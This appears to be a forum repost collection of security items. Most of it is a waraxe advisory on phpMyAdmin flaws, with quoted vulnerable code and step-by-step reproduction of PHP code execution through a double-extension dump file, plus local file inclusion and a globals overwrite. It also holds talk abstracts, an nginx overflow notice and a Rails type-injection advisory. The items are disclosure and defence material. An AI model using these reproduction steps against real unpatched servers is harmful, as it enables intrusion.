' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN $run_parts = true; break; case 'copy_tbl_change_prefix': $current = $selected[$i]; $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current); $a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) . ' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN $run_parts = true; break; ------------------------[ source code end ]------------------------------------ ############################################################################ 2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution ############################################################################ Reason: 1. insecure names of locally saved dump files Attack vectors: 1. user-supplied POST parameter "filename_template" Preconditions: 1. logged in as valid PMA user 2. configuration setting "SaveDir" defined and pointed to directory, which is writable for php and directly accessible over web (by default "SaveDir" is empty and PMA is secure) 3. Apache webserver with unknown MIME for "sql" extension PMA security advisory: PMASA-2013-3 CVE id: CVE-2013-3239 Affected are PMA versions 3.5.8 and 4.0.0-RC2 There is a security weakness in a way, how PMA handles locally saved database dump files. It is possible, that saved dump file has multiple extensions and if Apache webserver does not know MIME type of "sql" extension (that's how it is by default), then for example "foobar.php.sql" file will be treated as php file. More information: http://httpd.apache.org/docs/2.2/mod/mod_mime.html section "Files with Multiple Extensions" http://www.acunetix.com/websitesecurity/upload-forms-threat/ section "Case 4: Double extensions (part 1)" Test: 1. activate export to local server, be sure, that directory is writable: $cfg['SaveDir'] = './'; 2. select database for test, insert row into table with included php code like "<?php phpinfo();?>" 3. 
try to export that database or table, you have now additional option: "Save on server in the directory ./" Confirm that option, let the format be as "SQL". "File name template" change to "@DATABASE () php" and click "Go" button. Server responds with "Dump has been saved to file ./test.php.sql." 4. Request created file with webbrowser: http://localhost/PMA/test.php.sql In case of success we can see output of phpinfo() function, which confirms remote code execution. ############################################################################### 3. Local File Inclusion in "export.php" ############################################################################### Reason: 1. insufficient sanitization of user data before using in include_once Attack vectors: 1. user-supplied POST parameter "what" Preconditions: 1. logged in as valid PMA user 2. PHP must be < 5.3.4 for null-byte attacks to work PMA security advisory: PMASA-2013-4 CVE id: CVE-2013-3240 Affected is PMA version 4.0.0-RC2 Php script "export.php" line 20: ------------------------[ source code start ]---------------------------------- foreach ($_POST as $one_post_param => $one_post_value) { $GLOBALS[$one_post_param] = $one_post_value; } PMA_Util::checkParameters(array('what', 'export_type')); // export class instance, not array of properties, as before $export_plugin = PMA_getPlugin( "export", $what, 'libraries/plugins/export/', array( 'export_type' => $export_type, 'single_table' => isset($single_table) ) ); ------------------------[ source code end ]------------------------------------ We can see, that user-supplied parameter "what" is used as second argument for the function PMA_getPlugin(). 
Let's follow execution flow: Php script "libraries/plugin_interface.lib.php" line 20: ------------------------[ source code start ]---------------------------------- function PMA_getPlugin( $plugin_type, $plugin_format, $plugins_dir, $plugin_param = false ) { $GLOBALS['plugin_param'] = $plugin_param; $class_name = strtoupper($plugin_type[0]) . strtolower(substr($plugin_type, 1)) . strtoupper($plugin_format[0]) . strtolower(substr($plugin_format, 1)); $file = $class_name . ".class.php"; if (is_file($plugins_dir . $file)) { include_once $plugins_dir . $file; ------------------------[ source code end ]------------------------------------ As seen above, second argument "$plugin_format" is used in variable "$file" and after that in functions is_file() and include_once(). No sanitization is used against user submitted parameter "what", which leads to directory traversal and local file inclusion vulnerability. In case of older PHP version it may be possible to use null byte attack and include arbitrary files on server. ############################################################################### 4. $GLOBALS array overwrite in "export.php" ############################################################################### Reason: 1. insecure POST parameters importing Attack vectors: 1. user-supplied POST parameters Preconditions: 1. logged in as valid PMA user PMA security advisory: PMASA-2013-5 CVE id: CVE-2013-3241 Affected is PMA version 4.0.0-RC2 Php script "export.php" line 20: ------------------------[ source code start ]---------------------------------- foreach ($_POST as $one_post_param => $one_post_value) { $GLOBALS[$one_post_param] = $one_post_value; } PMA_Util::checkParameters(array('what', 'export_type')); ------------------------[ source code end ]------------------------------------ We can see, that arbitrary values in $GLOBALS array can be overwritten by submitting POST parameters. 
Such way of input data importing can be considered as very insecure and in specific situation it is possible to overwrite any variable in global scope. This can lead to many ways of exploitation. Below is presented one of the possibilities. Php script "export.php" line 59: ------------------------[ source code start ]---------------------------------- $onserver = false; $save_on_server = false; ... if ($quick_export) { $onserver = $_REQUEST['quick_export_onserver']; } else { $onserver = $_REQUEST['onserver']; } // Will we save dump on server? $save_on_server = ! empty($cfg['SaveDir']) && $onserver; ... // Open file on server if needed if ($save_on_server) { $save_filename = PMA_Util::userDir($cfg['SaveDir']) . preg_replace('@[/\\\\]@', '_', $filename); ... if (! $file_handle = @fopen($save_filename, 'w')) { $message = PMA_Message::error( ... /* If we saved on server, we have to close file now */ if ($save_on_server) { $write_result = @fwrite($file_handle, $dump_buffer); fclose($file_handle); ------------------------[ source code end ]------------------------------------ As seen above, when configuration setting "SaveDir" is set, then it is possible to save database dump to the PMA webserver. By default "SaveDir" is unset and this prevents possible security problems. As we can overwrite any variables in global scope, it is possible to set "SaveDir" to arbitrary value. This will lead to directory traversal vulnerability - attacker is able to save database dump to any directory in webserver, if only filesystem permissions allow that. Database dump can be with extension ".sql". If attacker can dump database with php code and tags in it, this content will be in dump file. If filename is something like "foobar.php.sql", then by default most Apache webserver installations will try to parse this dump file as php file, which can finally lead to the remote code execution vulnerability. 
Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 16.04.2013 -> Sent email to developers 16.04.2013 -> First response email from developers 16.04.2013 -> Sent detailed information to developers 24.04.2013 -> New PMA versions and security advisories released 25.04.2013 -> Current advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe () yahoo com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Sursa: phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities
  17. Hitb 2012 - Defibrilating Web Security Description: PRESENTATION ABSTRACT: Whether you are a consultant or a software engineer, you have probably realized by now that we're not really making a lot of progress on server-side web security. Consultants benefit from the resulting job security and developers want to focus on building awesome technology without spending a lot of time and energy building reusable security solutions, which are hard. Come and hear about the fallacies of the current approaches and a couple of ideas on how to address some of them. Among other things, this talk will introduce you to a contextual runtime taint tracking system with PoCs in Java and Ruby. ABOUT MEDER KYDYRALIEV Meder has been working in the area of application security for nearly a decade. He's poked at, broken, and helped fix a lot of code that businesses and parts of the Internet depend on (Struts2, JBoss Seam, Google Web Toolkit, and Ruby on Rails, to name a few). Some of the things that excite him include: karaoke, server-side security, kumys and making software security easier. Sursa: Hitb 2012 - Defibrilating Web Security
  18. Hitb 2012 - Hackers The Movie: A Retrospective Description: PRESENTATION ABSTRACT: In this lecture, Don A. Bailey will take a look back at another great milestone in information security: the movie Hackers. In this retrospective, Don will analyze every "hack" implemented in the cult classic and demonstrate how in modern day these attacks are even more relevant, realistic, and cost effective. Don will discuss the exact technologies used in modern day versions of these exploits and what tactical requirements are no longer glass ceilings for attackers. Mr. Bailey will also provide demonstrations that show low cost and creative ways to bypass physical security controls. Using simple, modern, and sometimes even rudimentary technology, demonstrations will show that no matter how complex a security control may be there is always a fast and effective bypass. Oh, and by the way... Hack the Planet. ABOUT DON BAILEY Don A. Bailey is an internationally respected security researcher known for breaking ground in the mobile and embedded security spaces. Don has given over thirty unique lectures on various advances in security technology over the last eight years, both around the world and within the United States. His research has been highlighted on news exchanges such as CNN, Reuters, NPR, BBC, FOX, and CBS. Don was recently featured in the IEEE Security & Privacy magazine for his recent work reverse engineering M2M systems such as vehicle security modules. Previously the Research Director for a prestigious security firm, Mr. Bailey recently founded the consulting and engineering organization Capitol Hill Consultants LLC. At CHC, Don focuses on government contracting, global defense-centric engagements, and mobile security consulting. Sursa: Hitb 2012 - Hackers The Movie: A Retrospective
  19. Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems Description: PRESENTATION ABSTRACT: For the 10th anniversary of HITB we keep it old school with an in-depth exploration of the reverse engineering and exploitation of embedded systems. We will cover hardware by showing how to identify and probe debugging and I/O ports on undocumented circuit board layouts. We will cover software by exploring the analysis, reverse engineer and binary patching techniques for obscure real time OSes and firmware images with real world examples. We are also going to address the post compromise art of debugging and patching running live kernels with custom backdoors or interception code. At least one Apple laptop embedded subsystem will be harmed during the course of the presentation. ABOUT ANDREA BARISANI Andrea Barisani is an internationally known security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break. His experiences focus on large-scale infrastructure administration and defense, forensic analysis, penetration testing and software development, with more than 10 years of professional experience in security consulting. Being an active member of the international Open Source and security community he contributed to several projects, books and open standards. He is now the founder and coordinator of the oCERT effort, the Open Source Computer Security Incident Response Team. He has been a speaker and trainer at BlackHat, CanSecWest, DEFCON, Hack In The Box, PacSec conferences among many others, speaking about TEMPEST attacks, SatNav hacking, 0-days, OS hardening and many other topics. ABOUT DANIELE BIANCO He began his professional career during his early years at university as system administrator and IT consultant for several scientific organizations. 
His interest for centralized management and software integration in Open Source environments has focused his work on design and development of suitable R&D infrastructure. One of his hobbies has always been playing with hardware and electronic devices. At the time being he is the resident Hardware Hacker for international consultancy Inverse Path where his research work focuses on embedded systems security, electronic devices protection and tamperproofing techniques. He presented at many IT security events and his works have been quoted by numerous popular media. Sursa: Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems
  20. Social Engineering – Art Of Human Brain Manipulation Description: Talk: SOCIAL ENGINEERING – Art of human brain manipulation Speaker: Muhammed Sherif Abstract: Social engineering is a common thing we do among our friends, relatives, etc. It's all about gaining information about a person, which sounds “not so bad” in real life. But it can be much more dangerous when it comes to cyberspace. Social engineering is a divine art of manipulating human minds to reveal confidential information which can then be used to attack them. It's a trickery process for information gathering. The attacks include Pretexting, Web phishing, IVR (Interactive Voice Response) or Phone phishing, Baiting, Something for something, Piggybacking, etc. Sursa: Social Engineering – Art Of Human Brain Manipulation
  21. Android Forensics Description: Talk: Android Forensics Speaker: Nikhalesh Singh Bhadroia Android is currently the world’s most popular smartphone operating system; it already holds over 72 percent of the market. This kind of popularity traditionally draws the eye of security researchers and attackers alike. Android presents a number of challenges to forensic practitioners, so here I am presenting forensic techniques. Sursa: Android Forensics
  22. Hacking IPv6 Networks Authored by Fernando Gont These are the slides for the "Hacking IPv6 Networks" security training course as given at BRUCON 2012. Download: http://packetstormsecurity.com/files/download/121415/fgont-brucon2012-hacking-ipv6-networks-training.pdf Sursa: Hacking IPv6 Networks ? Packet Storm
  23. nginx Integer Overflow Authored by Safe3 | Site safe3.com.cn Qihoo 360 Web Security Research Team discovered a critical vulnerability in nginx. The vulnerability is caused by an integer overflow error within the Nginx ngx_http_close_connection function when r->count is less than 0 or more than 255, which could be exploited by remote attackers to compromise a vulnerable system via malicious http requests. Website: http://safe3.com.cn I. BACKGROUND --------------------- Nginx is an HTTP and reverse proxy server, as well as a mail proxy server, written by Igor Sysoev. For a long time, it has been running on many heavily loaded Russian sites including Yandex, Mail.Ru, VKontakte, and Rambler. According to Netcraft nginx served or proxied 12.96% of the busiest sites in April 2013. Here are some of the success stories: Netflix, Wordpress.com, FastMail.FM. II. DESCRIPTION --------------------- Qihoo 360 Web Security Research Team discovered a critical vulnerability in nginx. The vulnerability is caused by an integer overflow error within the Nginx ngx_http_close_connection function when r->count is less than 0 or more than 255, which could be exploited by remote attackers to compromise a vulnerable system via malicious http requests. III. AFFECTED PRODUCTS --------------------------- Nginx all latest version IV. Exploits/PoCs --------------------------------------- In-depth technical analysis of the vulnerability and a fully functional remote code execution exploit are available through the safe3q@gmail.com In src\http\ngx_http_request_body.c ngx_http_discard_request_body function, we can make r->count++. V. VUPEN Threat Protection Program ----------------------------------- VI. SOLUTION ---------------- Validate the r->count input. VII. CREDIT -------------- This vulnerability was discovered by Safe3 of Qihoo 360. VIII. ABOUT Qihoo 360 --------------------------- Qihoo 360 is the leading provider of defensive and offensive web cloud security in China. IX. 
REFERENCES ---------------------- http://nginx.org/en/ Sursa: nginx Integer Overflow ? Packet Storm
  24. Microsoft SQL Server and IBM DB2 data-type injection attacks In the http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3221 entry, what we meant is that CVE-2013-3221 is exclusively about the behavior of Ruby on Rails as discussed in the listed MLIST:[rubyonrails-security] 20130207 reference. If a reference is about a data-type injection impact in an application other than a Ruby on Rails application, it should not be mapped to this CVE. However, an applicable reference about interaction between Ruby on Rails and Microsoft SQL Server (or interaction between Ruby on Rails and IBM DB2) should be mapped to this CVE. (There might be a misinterpretation that CVE-2013-3221 is only about interaction with MySQL. http://twitter.com/dakull/statuses/326633931636084736 possibly suggests that, but we're bringing this up mostly because of a comment that someone else sent directly to MITRE.) Common patterns used in Ruby on Rails applications could allow an attacker to generate SQL that, when combined with some database server's typecasting code, generates queries that match incorrect records. Note: This is a code and best-practice advisory; there is no patch to apply or updated version to install. Databases Affected: MySQL, SQL Server and some configurations of DB2 Not affected: SQLite, PostgreSQL, Oracle Outline - ------- When comparing two values of differing types, most databases will either generate an error or return 'false'. Other databases will attempt to convert those values to a common type to enable comparison. For example, in MySQL comparing a string with an integer will cast the string into an integer. Given that any string which isn't a valid integer will convert to 0, this could allow an attacker to bypass certain queries. If your application has XML or JSON parameter parsing enabled, an attacker will be able to generate queries like this unless you take care to typecast your input values. 
For example: User.where(:login_token=>params[:token]).first Could be made to generate the query: SELECT * FROM `users` WHERE `login_token` = 0 LIMIT 1; which will match the first record whose login_token does not contain a valid integer. This vulnerability affects multiple programming languages and multiple databases, so be sure to audit your other applications to see if they suffer from the same issues. Work Arounds - ------------ There are two options to avoid these problems. The first is to disable JSON and XML parameter parsing. Depending on the version of Rails you use, you will have to place one of the following snippets in an application initializer. Rails 3.2, 3.1 and 3.0: ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML) ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON) Rails 2.3: ActionController::Base.param_parsers.delete(Mime::XML) ActionController::Base.param_parsers.delete(Mime::JSON) If your application relies on accepting these formats, you will have to take care to explicitly convert parameters to their intended types. For example: User.where(:login_token=>params[:token].to_s) Fixes - ----- Unfortunately, it is not possible for ActiveRecord to automatically protect against all instances of this attack due to the API we expose. For example: User.where("login_token = ? AND expires_at > ?", params[:token], Time.now) Without parsing the SQL fragments, it is not possible to determine what type params[:token] should be cast to. Future releases of Rails will contain changes to mitigate the risk of this class of vulnerability; however, as long as this feature is still supported, this risk will remain. Credits - ------- Thanks to joernchen of Phenoelit for reporting this to us and to Jonathan Rudenberg for helping to review the advisory. 
- -- Cheers, Koz References: http://twitter.com/dakull/statuses/326633931636084736 http://seclists.org/oss-sec/2013/q2/170 http://cve.mitre.org/cve/request_id.html Sursa: Microsoft SQL Server and IBM DB2 data-type injection attacks - CXSecurity.com